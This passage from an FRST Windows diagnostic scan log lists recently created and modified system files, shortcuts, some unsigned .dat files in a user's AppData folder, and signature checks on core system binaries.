    2016-09-14 01:09 - 2016-06-06 12:50 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptnet.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 01176064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00179200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptsvc.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptnet.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 03156480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 00098816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
    2016-09-14 01:09 - 2016-05-13 18:07 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
    2016-09-14 01:09 - 2016-05-13 17:55 - 02607104 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2016-09-14 01:09 - 2016-05-13 17:53 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2016-09-14 01:09 - 2016-05-13 17:53 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
    2016-09-14 01:09 - 2016-05-13 17:52 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
    2016-09-14 01:09 - 2016-05-13 17:52 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
    2016-09-14 01:09 - 2016-05-13 17:52 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
    2016-09-14 01:09 - 2016-05-13 17:52 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wu.upgrade.ps.dll
    2016-09-14 01:09 - 2016-05-13 17:50 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
    2016-09-14 01:09 - 2016-05-13 17:38 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
    2016-09-14 01:09 - 2016-05-12 13:14 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
    2016-09-14 01:09 - 2016-05-12 11:18 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
    2016-09-14 01:09 - 2016-05-12 11:18 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
    2016-09-14 01:09 - 2016-05-04 13:21 - 00114408 _____ (Microsoft Corporation) C:\WINDOWS\system32\consent.exe
    2016-09-14 01:09 - 2016-05-04 13:17 - 03244032 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 02365440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 01806848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msihnd.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msihnd.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
    2016-09-14 01:09 - 2016-05-04 13:16 - 01941504 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
    2016-09-14 01:09 - 2016-05-04 13:16 - 00070144 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
    2016-09-14 01:09 - 2016-05-04 11:04 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
    2016-09-14 01:09 - 2016-05-04 10:55 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
    2016-09-13 21:45 - 2016-09-13 21:48 - 00000000 ____D C:\aa Samsung Master accum
    2016-09-13 01:39 - 2016-07-08 11:32 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
    2016-09-13 01:39 - 2016-07-08 11:16 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
    2016-09-12 21:48 - 2016-06-25 20:35 - 00041704 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
    2016-09-12 21:48 - 2016-06-25 20:27 - 01208320 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00756736 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00344576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetpp.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetppui.dll
    2016-09-12 21:48 - 2016-06-25 15:54 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32spl.dll
    2016-09-12 21:48 - 2016-06-25 15:53 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.dll
    2016-09-12 21:48 - 2016-06-25 15:53 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.exe
    2016-09-12 21:48 - 2016-06-25 15:53 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnpinst.exe
    2016-09-12 21:48 - 2016-06-25 15:41 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.exe
    2016-09-12 21:48 - 2016-06-22 09:06 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\centel.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00219136 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
    2016-09-12 19:48 - 2016-09-17 07:41 - 00000000 ____D C:\aa Canon 600D - T3i Master accum
    2016-09-12 19:47 - 2016-09-12 19:47 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-09-19 21:54 - 2009-07-14 01:08 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-09-19 21:09 - 2009-07-14 00:45 - 00020720 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2016-09-19 21:09 - 2009-07-14 00:45 - 00020720 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2016-09-19 20:59 - 2009-07-14 01:13 - 00790438 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-09-19 20:59 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\inf
    2016-09-19 03:11 - 2016-06-22 14:58 - 00000000 ____D C:\Users\SUPERDelete
    2016-09-19 03:08 - 2009-07-13 22:34 - 00000215 _____ C:\WINDOWS\system.ini
    2016-09-19 03:02 - 2016-01-29 17:35 - 00774756 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
    2016-09-18 20:43 - 2016-06-22 14:51 - 00001066 _____ C:\Users\Public\Desktop\VLC media player.lnk
    2016-09-18 20:43 - 2016-01-29 19:03 - 00002189 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002451 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive for Business.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002415 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002410 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002409 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002373 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002372 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002366 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002360 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002352 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
    2016-09-18 20:43 - 2016-01-21 19:43 - 00001015 _____ C:\Users\Administrator\Desktop\Virtual Moon Atlas.lnk
    2016-09-18 20:43 - 2016-01-21 15:55 - 00001852 _____ C:\Users\Public\Desktop\SUPERAntiSpyware Free Edition.lnk
    2016-09-18 20:43 - 2016-01-21 15:52 - 00001764 _____ C:\Users\Public\Desktop\Stellarium v14.2.lnk
    2016-09-18 20:43 - 2014-11-27 18:51 - 00001333 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
    2016-09-18 20:43 - 2014-11-27 18:51 - 00001314 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
    2016-09-18 20:43 - 2009-07-14 01:01 - 00001282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001340 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001318 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001234 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk
    2016-09-18 20:43 - 2009-07-14 00:54 - 00001198 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
    2016-09-18 20:43 - 2009-07-14 00:49 - 00001266 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
    2016-09-18 20:40 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\ModemLogs
    2016-09-18 10:24 - 2016-01-21 17:57 - 00000000 ____D C:\Users\Administrator\AppData\Local\ElevatedDiagnostics
    2016-09-18 10:24 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-09-18 07:44 - 2016-06-22 14:52 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\vlc
    2016-09-17 15:57 - 2016-01-21 15:50 - 00000000 ____D C:\Frank
    2016-09-17 15:11 - 2016-06-20 18:06 - 00000000 ____D C:\0000 decripted
    2016-09-16 21:45 - 2016-01-29 18:52 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2016-09-16 21:44 - 2016-01-29 18:50 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2016-09-16 21:25 - 2016-06-22 14:51 - 00000000 ____D C:\Users\Administrator\AppData\Local\Chromium
    2016-09-16 21:25 - 2009-07-13 23:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
    2016-09-16 21:14 - 2009-07-14 00:45 - 00438496 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2016-09-16 19:51 - 2016-06-22 15:50 - 00000138 _____ C:\Users\Administrator\AppData\Roaming\WB.CFG
    2016-09-16 10:53 - 2016-01-21 18:08 - 00111536 _____ C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
    2016-09-14 04:29 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\rescache
    2016-09-13 17:22 - 2016-01-29 20:30 - 00000000 ____D C:\WINDOWS\system32\appraiser
    2016-09-13 17:22 - 2016-01-21 15:55 - 00000000 ____D C:\Program Files\SUPERAntiSpyware

    ==================== Files in the root of some directories =======

    2016-09-18 08:03 - 2016-09-18 08:04 - 7090176 _____ () C:\Users\Administrator\AppData\Roaming\agent.dat
    2016-09-18 08:01 - 2016-09-18 08:01 - 0140288 _____ () C:\Users\Administrator\AppData\Roaming\Installer.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 0018432 _____ () C:\Users\Administrator\AppData\Roaming\Main.dat
    2016-06-22 15:50 - 2016-09-16 19:51 - 0000138 _____ () C:\Users\Administrator\AppData\Roaming\WB.CFG

    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-09-13 17:53

    ==================== End of FRST.txt ============================